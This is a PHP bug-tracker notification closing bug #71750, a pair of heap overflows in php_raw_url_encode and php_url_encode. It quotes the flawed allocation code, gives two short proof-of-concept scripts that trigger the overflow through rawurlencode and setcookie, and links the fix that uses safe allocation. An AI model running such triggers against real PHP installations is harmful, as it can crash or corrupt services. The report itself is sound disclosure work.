Bug #71750 [Opn->Csd]: Multiple Heap Overflows in php_raw_url_encode/php_url_encode
| From: | stas@php.net | Date: | Mon, 21 Mar 2016 06:11:10 +0000 |
| Subject: | Bug #71750 [Opn->Csd]: Multiple Heap Overflows in php_raw_url_encode/php_url_encode | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-199982@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=71750&edit=1
ID: 71750
Updated by: stas@php.net
Reported by: taoguangchen at icloud dot com
Summary: Multiple Heap Overflows in
php_raw_url_encode/php_url_encode
-Status: Open
+Status: Closed
Type: Bug
Package: *General Issues
PHP Version: 7.0.4
Block user comment: N
Private report: N
New Comment:
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c4517b2a5e3141393c1c4f6fca51e1c325e91251
Log: Fix bug #71750: use zend_string_safe_alloc for calculated allocations
Previous Comments:
------------------------------------------------------------------------
[2016-03-21 05:38:47] stas@php.net
This also does not look like security issue, requires specially crafted code.
------------------------------------------------------------------------
[2016-03-09 05:27:47] taoguangchen at icloud dot com
Description:
------------
Vulnerable code:
```
PHPAPI zend_string *php_raw_url_encode(char const *s, size_t len)
{
...
str = zend_string_alloc(3 * len, 0);
for (x = 0, y = 0; len--; x++, y++) {
ZSTR_VAL(str)[y] = (unsigned char) s[x];
...
PHPAPI zend_string *php_url_encode(char const *s, size_t len)
{
...
start = zend_string_alloc(3 * len, 0);
```
PoC:
```
<?php
//php_raw_url_encode
ini_set('memory_limit', -1);
rawurlencode(str_repeat('A', 0xffffffff/3));
```
```
<?php
//php_url_encode
ini_set('memory_limit', -1);
setcookie('hi', str_repeat('A', 0xffffffff/3));
```
Fix:
uses zend_string_safe_alloc instead
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=71750&edit=1